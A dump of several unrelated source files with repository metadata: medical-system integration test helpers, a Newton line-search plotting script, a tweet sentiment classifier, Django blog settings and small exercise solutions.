# delete_organization(testapp, risar_session, org_id)
edit_organization(testapp, risar_session, org_id, get_organization_data_more(org_id))
def mis_to_mr_doctor(testapp, org_id, doctor_id):
# create_doctor(testapp, risar_session, get_doctor_data_required(org_id, doctor_id))
# delete_doctor(testapp, risar_session, org_id, doctor_id)
edit_doctor(testapp, risar_session, org_id, doctor_id, get_doctor_data_more(org_id, doctor_id))
def mis_to_mr_client(testapp, client_id):
# create_client(testapp, risar_session, get_client_data_required(client_id))
edit_client(testapp, risar_session, client_id, get_client_data_more(client_id))
def mr_make_appointment(testapp, client_id, ticket_id, doctor_id):
is_delete = False
make_appointment(risar_session, get_mr_appointment_data(client_id, ticket_id, doctor_id, is_delete))
def mr_to_mis_sch_ticket(testapp, org_id, doctor_id, client_id, ticket_id):
is_delete = False
send_event_remote(testapp, risar_session, get_sch_ticket_data_required(
is_delete, client_id, ticket_id, org_id, doctor_id
))
# def mr_create_card(testapp, client_id, sch_client_ticket_id=None):
# res = create_card(risar_session, client_id, sch_client_ticket_id)
# card_id = res['result']['card_id']
# return card_id
def mr_to_mis_card(testapp, client_id, card_id):
is_create = False
request_local(testapp, risar_session, get_send_to_mis_card_data(client_id, card_id, is_create))
# def mr_create_first_checkup(testapp, card_id):
# res = create_first_checkup(risar_session, card_id, get_first_checkup_data_required())
# checkup_id = res['result']['checkup_id']
# return checkup_id
def mr_to_mis_first_ticket25(testapp, card_id, checkup_id):
is_create = True
request_local(testapp, risar_session, get_send_to_mis_first_ticket25_data(card_id, checkup_id, is_create))
def mr_to_mis_second_ticket25(testapp, card_id, checkup_id):
is_create = True
request_local(testapp, risar_session, get_send_to_mis_second_ticket25_data(card_id, checkup_id, is_create))
def mr_to_mis_pc_ticket25(testapp, card_id, checkup_id):
is_create = True
request_local(testapp, risar_session, get_send_to_mis_pc_ticket25_data(card_id, checkup_id, is_create))
def mr_to_mis_first_checkup(testapp, card_id, checkup_id):
is_create = True
request_local(testapp, risar_session, get_send_to_mis_first_checkup_data(card_id, checkup_id, is_create))
def mr_to_mis_second_checkup(testapp, card_id, checkup_id):
is_create = True
request_local(testapp, risar_session, get_send_to_mis_second_checkup_data(card_id, checkup_id, is_create))
def mr_to_mis_pc_checkup(testapp, card_id, checkup_id):
is_create = True
request_local(testapp, risar_session, get_send_to_mis_pc_checkup_data(card_id, checkup_id, is_create))
def mr_to_mis_measures(testapp, card_id):
is_create = True
request_local(testapp, risar_session, get_send_to_mis_measures_data(card_id, is_create))
def mis_to_mr_meas_sp_checkup(testapp, card_id, org_id, doctor_id, event_measure_id, sp_checkup_id):
create_sp_checkup(testapp, risar_session, card_id, get_sp_checkup_data_required(
org_id, doctor_id, event_measure_id, sp_checkup_id))
# edit_sp_checkup(testapp, risar_session, card_id, sp_checkup_id, get_sp_checkup_data_more(
# org_id, doctor_id, event_measure_id, sp_checkup_id))
def mis_to_mr_meas_hosp(testapp, card_id, org_id, doctor_id, event_measure_id, meas_hosp_id):
create_hospitalization(testapp, risar_session, card_id, get_meas_hosp_data_required(
org_id, doctor_id, event_measure_id, meas_hosp_id))
edit_hospitalization(testapp, risar_session, card_id, meas_hosp_id, get_meas_hosp_data_more(
org_id, doctor_id, event_measure_id, meas_hosp_id))
def mis_to_mr_meas_research(testapp, card_id, org_id, doctor_id, event_measure_id, meas_research_id):
create_research(testapp, risar_session, card_id, get_meas_research_data_required(
org_id, doctor_id, event_measure_id, meas_research_id))
# edit_research(testapp, risar_session, card_id, meas_research_id, get_meas_research_data_more(
# org_id, doctor_id, event_measure_id, meas_research_id))
def mis_to_mr_first_ticket25(testapp, card_id, org_id, doctor_id, checkup_id):
edit_checkup_first_ticket25(testapp, risar_session, card_id, checkup_id, get_first_ticket25_data_more(
org_id, doctor_id, checkup_id))
def mis_to_mr_childbirth(testapp, card_id, org_id, doctor_id):
# create_childbirth(testapp, risar_session, card_id, get_childbirth_data_required(org_id, doctor_id))
edit_childbirth(testapp, risar_session, card_id, get_childbirth_data_more(org_id, doctor_id))
def mr_to_mis_epicrisis(testapp, card_id):
is_create = False
request_local(testapp, risar_session, get_send_to_mis_epicrisis_data(card_id, is_create))
|
[
"paschenko@bars-open.ru"
] |
paschenko@bars-open.ru
|
c19d323dd79ed8200a36279528eb8fd77c5d502e
|
b3122fec6858e1b4474889bc0b58cbdbec40ac34
|
/DZ5/DZ5_5.py
|
bb40fae277a8a97cfcacfb80f5a0604210a86293
|
[] |
no_license
|
Mehalich/git-geekbrains
|
edb05ceb7643e02d1334d118d6e304720a266066
|
e6833de99b5c2c37a4d16b7856fa85ba1f17117a
|
refs/heads/main
| 2023-04-30T00:54:10.232243
| 2021-05-16T16:51:52
| 2021-05-16T16:51:52
| 359,473,465
| 1
| 0
| null | 2021-05-16T16:54:21
| 2021-04-19T13:40:34
|
Python
|
UTF-8
|
Python
| false
| false
| 536
|
py
|
"""
5. Создать (программно) текстовый файл, записать в него программно набор чисел, разделенных пробелами.
Программа должна подсчитывать сумму чисел в файле и выводить ее на экран.
"""
f = open("DZ5_5.txt", "w+")
f.write("1 2 3 4 5 6 7 8 9 0")
f.seek(0)
line = f.readlines()
result = 0
line = str(line[0])
line = line.split()
for step in line:
result += int(step)
print(result)
f.close()
|
[
"yakovlev_mv@mail.ru"
] |
yakovlev_mv@mail.ru
|
4fb0d462d89a6686b3a67fd657cc1c0eb304bb7f
|
38d1ef01184bbdb3898b8cf495eeee48eaa1a30a
|
/Newton_Optimization/newton_linesearch.py
|
537cf2deab73ebdd2706c24882b81d41bace2821
|
[] |
no_license
|
LenCewa/MasterThesis
|
39c86c8ab3c752fedc445fea14368bbd74ca8f3a
|
b2d4d67b7ae2f363dd627ecb4355de1ae6ef04a3
|
refs/heads/master
| 2020-06-16T15:47:29.971151
| 2020-04-15T09:29:43
| 2020-04-15T09:29:43
| 195,626,164
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,840
|
py
|
import numpy as np
import matplotlib.pyplot as plt
from Fourier import *
from util import *
# Init Params for Fourier-Classes
N = 5
omega = 1
T = (2 * jnp.pi) / omega
step_size = 0.001
iterations = 450
fourier = Fourier(T, omega, step_size, N, iterations, [], [])
d_fourier = dFourier(T, omega, step_size, N, iterations, [], [])
dd_fourier = ddFourier(T, omega, step_size, N, iterations, [], [])
def L(x, y):
fx = fourier.predict(fourier.coefficients, x)
return np.abs(y - fx)**2
def dL(x, y):
fx = fourier.predict(fourier.coefficients, x)
dfx = d_fourier.predict(fourier.coefficients, x)
return 2 * (y - fx) * (-dfx)
def ddL(x, y):
fx = fourier.predict(fourier.coefficients, x)
dfx = d_fourier.predict(fourier.coefficients, x)
ddfx = dd_fourier.predict(fourier.coefficients, x)
return 2 * (dfx**2 - (y - fx) * ddfx)
def newton_optimization_linesearch(y, x0, iterations, alpha0, damping0):
res = [jnp.array([x0])]
err = []
alpha = alpha0
damping = damping0
roh = [1.2, 0.5, 1, 0.5, 0.01]
for k in range(iterations):
x = res[k]
fx = fourier.predict(fourier.coefficients, x)
dfx = dL(x,y)
ddfx = ddL(x,y)
i = 0
err += [np.linalg.norm(y - fx)]
if err[k] < 1e-3: break
d = -dfx / (ddfx + damping)
fx_alphad = fourier.predict(fourier.coefficients, x + alpha * d)
while fx_alphad > (fx + roh[4]*dfx * alpha * d):
print("Iteration: ", k , " while-loop: ", i)
print("f(x + alpha * d) = ", fx_alphad, " > f(x) + r*f'(x) = ", fx + roh[4]*dfx)
i += 1
alpha = roh[1]*alpha
# Optionally:
damping = roh[2]*damping
d = -dfx / (ddfx + damping)
fx_alphad = fourier.predict(fourier.coefficients, x + alpha * d)
x = x + alpha * d
res += [x]
alpha = np.min([roh[0], alpha, 1])
# Optinally:
damping = roh[3] * damping
return res, err
t = jnp.linspace(0, 10*np.pi, num=1000)
x0 = 2
y0 = fourier.predict(fourier.coefficients, x0)
const_y0 = np.full(len(t), y0)
f = fourier.batched_predict(fourier.coefficients, t)
df = d_fourier.batched_predict(fourier.coefficients, t)
ddf = dd_fourier.batched_predict(fourier.coefficients, t)
const_0 = np.full(len(t), 0)
# Run Newton Optimization
steps = 20
x_start = 1.5
alpha0 = 1
damping0 = 0.999
res, err = newton_optimization_linesearch(y0[0], x_start, steps, alpha0, damping0)
fx_t = []
ex_t = []
for x in res:
pred = fourier.predict(fourier.coefficients, x)[0]
fx_t += [pred]
ex_t += [(y0 - pred)**2]
print(res)
print(err)
L = L(t, y0)
dL = dL(t, y0)
ddL = ddL(t, y0)
fig, axs = plt.subplots(3, 2)
fig.suptitle("Newton Line Search: x* = " + str(x0) + ", y* = " + str(y0[0]) + ", x0 = " + str(x_start) + " ||| steps = " + str(steps))
axs[0, 0].plot(t, f)
axs[0, 0].plot(t, const_y0, 'tab:red')
axs[0, 0].plot(res, fx_t, 'k.-')
axs[0, 0].plot(res[-2], fx_t[-2], 'ro')
axs[0, 0].plot(res[-1], fx_t[-1], 'g*')
axs[0, 0].set_title('f and y*')
axs[1, 0].plot(t, df, 'tab:orange')
axs[1, 0].set_title('df')
axs[2, 0].plot(t, ddf, 'tab:green')
axs[2, 0].set_title('ddf')
axs[0, 1].plot(t, L)
axs[0, 1].plot(t, const_0, 'tab:red')
axs[0, 1].plot(res, ex_t, 'k.-')
axs[0, 1].plot(res[-2], ex_t[-2], 'ro')
axs[0, 1].plot(res[-1], ex_t[-1], 'g*')
axs[0, 1].set_title('L')
axs[1, 1].plot(t, dL, 'tab:orange')
axs[1, 1].plot(t, const_0, 'tab:red')
axs[1, 1].set_title('dL')
axs[2, 1].plot(t, ddL, 'tab:green')
axs[2, 1].set_title('ddL')
for ax in axs.flat:
ax.set(xlabel='x-label', ylabel='y-label')
# Hide x labels and tick labels for top plots and y ticks for right plots.
# for ax in axs.flat:
# ax.label_outer()
plt.show()
#plt.savefig("LineSearchFigs/Newton_LineSearch_x0=" + str(x_start) + ".png")
|
[
"len13@hotmail.de"
] |
len13@hotmail.de
|
832a298328bc29b34d0110a3029f906ad483a34d
|
37c3b81ad127c9e3cc26fa9168fda82460ca9bda
|
/Baekjoon/boj_20055_컨베이어 벨트 위의 로봇.py
|
dfdb3152402dc2cfac4c545e7cd087fba933dcf0
|
[] |
no_license
|
potomatoo/TIL
|
5d85b69fdaed68966db7cfe2a565b7c64ed3e816
|
395dc190fa13e5ed036e1e3c7d9e0bc2e1ee4d6c
|
refs/heads/master
| 2021-07-08T16:19:40.410097
| 2021-04-19T02:33:40
| 2021-04-19T02:33:40
| 238,872,774
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 751
|
py
|
def work():
global cnt
while True:
board.rotate(1)
robot.rotate(1)
robot[N-1] = 0
for i in range(N-2, -1, -1):
if robot[i] and not robot[i+1] and board[i+1] > 0:
board[i+1] -= 1
robot[i+1] = 1
robot[i] = 0
robot[N-1] = 0
if not robot[0] and board[0] > 0:
board[0] -= 1
robot[0] = 1
flag = 0
for i in range(len(board)):
if board[i] == 0:
flag += 1
if flag >= K:
break
cnt += 1
from collections import deque
N, K = map(int, input().split())
board = deque(map(int, input().split()))
cnt = 1
robot = deque([0] * len(board))
work()
print(cnt)
|
[
"duseh73@gmail.com"
] |
duseh73@gmail.com
|
7951551b827a4fe78a0de05909e4bf7b4a989c18
|
34dd52bca544fd483606667fd9f867d6af68ef28
|
/exercise2/classification05.py
|
5146516b8e14e60c85d27ad8f4ef7e39f92cd66d
|
[] |
no_license
|
Anderbone/CS918NaturalLanguageProcessing
|
8e68bd4a61758c2f127a344152fc1ad74f972e4c
|
ef1e68685e85e76354040c7359c2f29b0da7eff6
|
refs/heads/master
| 2020-05-24T18:15:00.075093
| 2019-05-18T21:26:42
| 2019-05-18T21:26:42
| 187,406,366
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,174
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import testsets
import evaluation
import twokenize
import sklearn.feature_extraction
from nltk.classify.scikitlearn import SklearnClassifier
import sklearn
import pandas as pd
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
import textPreprocessor01
import nltk
from nltk.stem import *
from nltk.probability import FreqDist
from nltk.corpus import sentiwordnet as swn
from gensim.models import word2vec
# import word2vecReader
from sklearn.naive_bayes import GaussianNB, MultinomialNB
from sklearn.pipeline import Pipeline
from sklearn import svm
from sklearn.externals import joblib
from sklearn.feature_extraction import DictVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn import preprocessing
import pandas as pd
from sklearn.preprocessing import StandardScaler
from sklearn import tree
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
# TODO: load training data
def read_training_data(training_data):
id_gts = {}
with open(training_data, 'r', encoding='utf-8') as f:
for line in f:
fields = line.split('\t')
tweetid = fields[0]
gt = fields[1]
content = fields[2].strip()
id_gts[tweetid] = gt, content
return id_gts
# traindic = read_training_data('twitter-training-data1.txt')
# traindic = read_training_data('twitter-training-data_small.txt')
traindic = read_training_data('twitter-training-data.txt')
# input here
def perprocessing(tdic):
new_dic = {}
for line in tdic:
id = line
gt = tdic[line][0]
raw = ' '.join(twokenize.tokenizeRawTweetText(tdic[line][1]))
text = twokenize.normalizeTextForTagger(raw)
text_tk = twokenize.tokenize(text)
telist = []
for word in text_tk:
word = word.lower()
ps = nltk.stem.PorterStemmer()
word = ps.stem(word)
telist.append(word)
newtext = ' '.join(telist)
# print(newtext)
newtext = textPreprocessor01.replaceall(newtext)
new_dic[id] = gt, newtext
return new_dic
# print(new_dic)
def get_train_corpus(new_dic):
traincorpus = []
for line in new_dic:
traincorpus.append(new_dic[line][1])
return traincorpus
def get_split_corpus(new_dic):
split_traincorpus = []
for line in new_dic:
split_traincorpus.append(new_dic[line][1].split())
return split_traincorpus
# tdic = read_training_data('twitter-training-data.txt')
# print(tdic)
# for i in tdic:
# print(i) #id
# print(tdic[i])
# print(tdic[i][0]) # gt. positive/negative
# print(tdic[i][1]) # content
# print(corpus)
# print(split_corpus)
# TODO extract features
def get_vect():
vect = CountVectorizer(stop_words='english' ,lowercase=True)
# vect = CountVectorizer(stop_words='english', min_df= ,lowercase=True)
# vectorizer = CountVectorizer(stop_words='english', ngram_range=(1, 2))
X = vect.fit_transform(train_corpus)
return vect, X
def get_train_ngrams():
# vectorizer = CountVectorizer(stop_words='english')
# vect = CountVectorizer(stop_words='english')
# # vectorizer = CountVectorizer(stop_words='english', ngram_range=(1, 2))
# X = vect.fit_transform(corpus)
# print(vectorizer.vocabulary_)
X = get_vect()[1]
# print(vectorizer.vocabulary_.keys())
# print('ngram----')
# print(X.todense())
# print(len(X.todense()))
# X.todense()
# print(X.toarray())
return np.array(X.todense())
def get_test_ngrams(corpus):
vect = get_vect()[0]
X = vect.transform(corpus)
b = X.todense()
return np.array(b)
def get_tfidf(corpus):
# vectorizer = CountVectorizer(stop_words='english')
# vectorizer = CountVectorizer(stop_words='english', ngram_range=(1, 2))
vect = get_vect()[0]
tfidf = TfidfVectorizer(vocabulary=list(vect.vocabulary_.keys()), min_df=0.6, lowercase=True, stop_words='english')
tfs = tfidf.fit_transform(corpus)
# X = vect.fit_transform(corpus)
# print(vectorizer.vocabulary_)
# print(vectorizer.vocabulary_.keys())
tt = tfs.todense()
# print('tfid..')
# print(len(tt))
return np.array(tt)
# maybe it's wrong
def wordembedding(split_corpus):
# model = word2vec.Word2Vec(sentences, \
# workers=num_workers, \
# size=num_features, \
# min_count=min_word_count, \
# window=context,
# sample=downsampling)
model = word2vec.Word2Vec(split_corpus, size=50, min_count=1)
# To make the model memory efficient
model.init_sims(replace=True)
# Saving the model for later use. Can be loaded using Word2Vec.load()
model_name = "wordembedding_features"
model.save(model_name)
# print(model['may'])
# print('word embedding --------------')
# print(model.wv.syn0)
# print(model.wv.vocab)
# print(len(model.wv.vocab))
# print(model.wv.index2word)
print(len(model.wv.index2word))
print(len(model.wv.syn0))
# right here
def word_embedding2(split_corpus):
# print('word embedding2 --------------------')
all = []
for i in split_corpus:
# print(i)
model = word2vec.Word2Vec([i], size=300, min_count=1)
# print(model.vocabulary)
# print(model.wv.vocab)
# s = model.wv.syn0
s = model.wv.vectors
ans = list(map(sum, zip(*s))) # sum of them
all.append(ans)
return np.array(all)
def senti_bi_lexicon(split_corpus):
def inputfile(file):
with open(file, 'r') as my_file:
words = [every_line.rstrip() for every_line in my_file]
return words
def count_p_n(mylist):
pos_num = 0
neg_num = 0
positive = inputfile('positive-words.txt')
negative = inputfile('negative-words.txt')
p_dic = FreqDist(positive)
n_dic = FreqDist(negative)
for word in mylist:
pos_num += p_dic[word]
neg_num += n_dic[word]
return pos_num, neg_num
P_N = []
for line in split_corpus:
p_num_all = n_num_all = 0
p_n_num = count_p_n(line)
p_num_all += p_n_num[0]
n_num_all += p_n_num[1]
P_N.append([p_num_all, n_num_all])
# print('sent..')
# print(len(P_N))
return np.array(P_N)
def get_url(split_corpus):
url = []
for i in split_corpus:
num = i.count('URLLINK')
url.append([num])
# print(url)
# print(len(url))
return np.array(url)
def get_mention(split_corpus):
men = []
for i in split_corpus:
num = i.count('USERMENTION')
men.append([num])
# print(url)
# print(len(url))
return np.array(men)
def get_face(split_corpus):
face = []
for i in split_corpus:
numi = i.count('HAPPYFACE')
numj = i.count('SADFACE')
face.append([numi, numj])
# print(url)
# print(len(url))
return np.array(face)
newdic = perprocessing(traindic)
train_corpus = get_train_corpus(newdic)
split_corpus = get_split_corpus(newdic)
# print(split_corpus)
F1 = get_train_ngrams()
F2 = get_tfidf(train_corpus)
F3 = senti_bi_lexicon(split_corpus)
# print(F3)
F4 = word_embedding2(split_corpus)
# print(F4)
F5 = get_url(split_corpus)
# print(F5)
F6 = get_mention(split_corpus)
F7 = get_face(split_corpus)
# print(F7)
# print(F7)
# X = np.concatenate((F3, F4, F5, F7), axis=1)
# X = np.concatenate((F3, F1, F5, F7), axis=1)
# print(X)
# labels_to_array = {"positive": 1, "negative": -1, "neutral": 0}
labels_to_array = {"positive": 0, "negative": 2, "neutral": 1}
labels = [labels_to_array[newdic[tweet][0]] for tweet in newdic]
# print(labels)
# print('5.Y..')
Y = np.array(labels)
# X3 = F5
# print(F3)
# X = F1
# X = F2
# X = F4
# X5 = F5
# X35 = np.concatenate((X3, X5), axis=1)
# X = F5
# X = F6
# print(F5)
# print(F6)
# X = np.concatenate((F1, F2, F3, F4, F5, F6, F7), axis=1)
# X = np.concatenate((F1, F3), axis=1)
# X = F7
for classifier in ['MNB','Naive Bayes', 'Decision Tree', 'Logistic Regression', 'Random Forest', 'KNN']:
# for classifier in ['Naive Bayes', 'Decision Tree', 'Logistic Regression', 'Random Forest', 'KNN']:
# You may rename the names of the classifiers to something more descriptive
if classifier == 'Naive Bayes':
print('Training ' + classifier)
# TODO: extract features for training classifier1
# TODO: train sentiment classifier1
# X = F1
# Y = Y.reshape(Y.size, 1)
X = np.concatenate((F3, F5, F4, F7), axis=1)
model = GaussianNB()
model.fit(X, Y)
# vec = DictVectorizer(sparse=False)
# svm_clf = svm.SVC(kernel='linear')
# model = Pipeline([('vectorizer', vec), ('svm', svm_clf)])
# model = svm.SVC()
elif classifier == 'MNB':
print('Training ' + classifier)
# TODO: extract features for training classifier3
# TODO: train sentiment classifier3
# model = SklearnClassifier(MultinomialNB())
# model.train(X)
X = F1
# base_model = MultinomialNB(alpha=1)
# model = OnevsRestClassifier(base_model).fit(X,Y)
model = MultinomialNB(alpha=1, class_prior=None, fit_prior=True)
# model.fit(np.array(X), np.array(Y))
# print(X)
model.fit(X, Y)
# joblib.dump(model, 'F3_and_SVM.pkl')
elif classifier == 'Decision Tree':
print('Training ' + classifier)
# TODO: extract features for training classifier2
# TODO: train sentiment classifier2
# X = F3
X = np.concatenate((F3, F4, F7), axis=1)
model = tree.DecisionTreeClassifier()
model.fit(X, Y)
# lr = Pipeline([('sc', StandardScaler()),
# ('clf', LogisticRegression())])
# y_hat = lr.predict(x_test)
# y_hat = y_hat.reshape(x1.shape)
elif classifier == 'Logistic Regression':
print('Training ' + classifier)
# TODO: extract features for training classifier3
# TODO: train sentiment classifier3
X = np.concatenate((F3, F4,F5, F7), axis=1)
model = LogisticRegression()
# model.fit(x, y.ravel())
model.fit(X, Y)
elif classifier == 'Random Forest':
print('Training ' + classifier)
# TODO: extract features for training classifier3
# TODO: train sentiment classifier3
model = RandomForestClassifier(n_estimators=100, random_state=0)
# forest = RandomForestClassifier(criterion='entropy',
# n_estimators = 10,
# random_state = 1,
# n_jobs = 2)
X = F2
model.fit(X, Y)
elif classifier == 'KNN':
print('Training ' + classifier)
# TODO: extract features for training classifier3
# TODO: train sentiment classifier3
model = KNeighborsClassifier(n_neighbors=5, p=2)
# model = KNeighborsClassifier(n_neighbors=5, p=2, metric='minkowski')
X = F3
model.fit(X, Y)
# mymodel = model
for testset in testsets.testsets:
# TODO: classify tweets in test set
# if testset == 'twitter-test1.txt':
test = read_training_data(testset)
testdic = perprocessing(test)
t_corpus = get_train_corpus(testdic)
ts_corpus = get_split_corpus(testdic)
tF1 = get_test_ngrams(t_corpus)
tF2 = get_tfidf(t_corpus)
tF3 = senti_bi_lexicon(ts_corpus)
tF4 = word_embedding2(ts_corpus)
tF5 = get_url(ts_corpus)
tF6 = get_mention(ts_corpus)
tF7 = get_face(ts_corpus)
if classifier == 'Naive Bayes':
Xt = np.concatenate((tF3, tF4, tF5, tF7), axis=1)
elif classifier == 'MNB':
Xt = tF1
elif classifier == 'Logistic Regression':
Xt = np.concatenate((tF3, tF4, tF5, tF7), axis=1)
# Xt = tF4
elif classifier == 'KNN':
Xt = tF3
elif classifier == 'Decision Tree':
Xt = np.concatenate((tF3, tF7, tF4), axis=1)
elif classifier == 'Random Forest':
Xt = tF2
# ans_num = model.predict(t_F3)
# model = joblib.load('F3_and_SVM.pkl')
# ans_num = model.predict(t_F3)
# ans_num = model.predict(t_F5)
# Xt = np.concatenate((tF1, tF2, tF3, tF4, tF5, tF6), axis=1)
# Xt = np.concatenate((tF1, tF2, tF3, tF4, tF5, tF6, tF7), axis=1)
# Xt = np.concatenate((tF1, tF3, tF5, tF6, tF7), axis=1)
# Xt = np.concatenate((tF3, tF1, tF5, tF7), axis=1)
# Xt = np.concatenate((tF1), axis=1)
# Xt = tF7
# Xt = tF1
ans_num = model.predict(Xt)
# ans_num = model.predict(t_F1)
# ans_num = model.predict(t_F2)
# # print(ans)
# # print(len(ans))
array_to_labels = {0: "positive", 2: "negative", 1: "neutral"}
labels = [array_to_labels[i] for i in ans_num]
# # print(labels)
# # ans_dic = {}
predictions = dict(zip(list(testdic.keys()), labels))
# print(ans_dictionary)
# predictions = {'163361196206957578': 'neutral', '768006053969268950': 'neutral', '742616104384772304': 'neutral', '
# 102313285628711403': 'neutral', '653274888624828198': 'neutral'}
# TODO: Remove this line, 'predictions' should be populated with the outputs of your classifier
# predictions = ans_dictionary
evaluation.evaluate(predictions, testset, classifier)
evaluation.confusion(predictions, testset, classifier)
|
[
"noreply@github.com"
] |
noreply@github.com
|
5defb566e1ea2c00089fc94bb725b27db106978b
|
c092a30eb6e977cd021cb5d2670c5d3b4a3ac062
|
/markliu/settings.py
|
27f0f08471f7ec9cf0430cc6c6cdaba2053df9bd
|
[] |
no_license
|
joskid/personal-django-blog
|
28a1789034f92091e622079b583d3aa1e33c0c8c
|
917a4182e9af49967280608f6a4378c8b386bb91
|
refs/heads/master
| 2020-12-25T02:30:36.280993
| 2012-12-14T15:52:59
| 2012-12-14T15:52:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,043
|
py
|
# Django settings for the blog markliu.me
import os
import socket
import sys
import dj_database_url
# Test to see if local_settings exists. If it doesn't exist then this is on the live host.
if os.path.isfile('local_settings.py'):
LIVEHOST = False
else:
LIVEHOST = True
USE_STATICFILES = False
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
ADMINS = (
('Mark Liu', 'markwayneliu@gmail.com'),
)
MANAGERS = ADMINS
if LIVEHOST:
DEBUG = os.environ.get('DJANGO_DEBUG', '').lower() == "true"
# Heroku settings: https://devcenter.heroku.com/articles/django#database-settings
DATABASES = {'default': dj_database_url.config(default='postgres://localhost')}
# Django storages
AWS_STORAGE_BUCKET_NAME = os.environ['AWS_STORAGE_BUCKET_NAME']
AWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']
AWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']
USE_STATICFILES = True
S3_URL = 'https://s3.amazonaws.com/{0}/'.format(AWS_STORAGE_BUCKET_NAME)
# URL prefix for static files.
STATIC_URL = S3_URL
GOOGLE_WEBMASTER_KEY = os.environ['GOOGLE_WEBMASTER_KEY']
SECRET_KEY = os.environ['SECRET_KEY']
DISQUS_API_KEY = os.environ['DISQUS_API_KEY']
DELICIOUS_PASSWORD = os.environ['DELICIOUS_PASSWORD']
MEDIA_ROOT = ''
MEDIA_URL = ''
else:
DEBUG = True
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(PROJECT_ROOT, 'mark-liu.db'),
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
}
}
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.join(PROJECT_ROOT, 'media/')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = 'http://127.0.0.1:8000/media/'
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/admin/'
STATIC_URL = '/media/'
# Django storages
AWS_ACCESS_KEY_ID = '' # To use this to upload files to S3, this should be defined in local_settings.py
AWS_SECRET_ACCESS_KEY = '' # To use this to upload files to S3, this should be defined in local_settings.py
if 'collectstatic' in sys.argv:
USE_STATICFILES = True
STATICFILES_DIRS = (
os.path.join(PROJECT_ROOT, './media/'),
)
TEMPLATE_DEBUG = DEBUG
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# Make this unique, and don't share it with anybody.
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
]
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Debug toolbar. This goes after any middleware that encodes the response's content.
'debug_toolbar.middleware.DebugToolbarMiddleware',
)
ROOT_URLCONF = 'markliu.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(PROJECT_ROOT, 'templates/'),
)
INSTALLED_APPS = (
'django.contrib.staticfiles',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.markup',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.admin',
'django.contrib.flatpages',
'south',
'coltrane',
'tagging',
'debug_toolbar',
'disqus',
'django_twitter_tags',
'google_webmaster',
'django_posterous',
)
# INTERNAL_IPS is used for django-debug-toolbar.
#INTERNAL_IPS = ('127.0.0.1',)
# For django-debug-toolbar.
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False,
}
DELICIOUS_USER = 'mliu7'
DISQUS_WEBSITE_SHORTNAME = 'markliusblog'
DJANGO_POSTEROUS_SITE_NAME = 'wiscospike' # The site name of your posterous site (yoursitename.posterous.com)
DJANGO_POSTEROUS_BLOG_MODULE = 'coltrane' # The module of your django blog
DJANGO_POSTEROUS_BLOG_MODEL = 'Entry' # The model where the blog posts are stored
DJANGO_POSTEROUS_TITLE_FIELD = 'title' # The name of the title field within your blog model
DJANGO_POSTEROUS_BODY_FIELD = 'body_html' # The name of the field where your post will be stored
DJANGO_POSTEROUS_DATE_FIELD = 'pub_date' # The name of the field where the date of the post will be stored
DJANGO_POSTEROUS_AUTHOR_FIELD = 'author' # The name of the field where the author of the post will be stored
##############################################################################
# Django-storages
DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage'
if USE_STATICFILES:
STATICFILES_STORAGE = DEFAULT_FILE_STORAGE
AWS_QUERYSTRING_AUTH = False
AWS_HEADERS = {
'Cache-Control': 'max-age=3600',
}
try:
from local_settings import *
except ImportError:
pass
|
[
"markwayneliu@gmail.com"
] |
markwayneliu@gmail.com
|
7b1bd474762dbf9fa0ad77e916a9a288222c806a
|
44494598f8edcee0319f3b4ef69b704fbf6d88f2
|
/code/twurtle/src/TestDCMotorRobot.py
|
aad26a3b8a287a62bb2e513d1e4b4b865f1e0879
|
[] |
no_license
|
whaleygeek/pyws
|
3cebd7e88b41e14d9c1e4dbb8148de63dadbdd57
|
e60724646e49287f1e12af609f325ac228b31512
|
refs/heads/master
| 2021-01-02T09:01:47.644851
| 2014-09-02T19:47:20
| 2014-09-02T19:47:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 168
|
py
|
# This is mainly to test that the packaging has worked for robot correctly
import robot
r = robot.MotorRobot(robot.DCMotorDrive(a1=11, a2=12, b1=13, b2=14))
r.test()
|
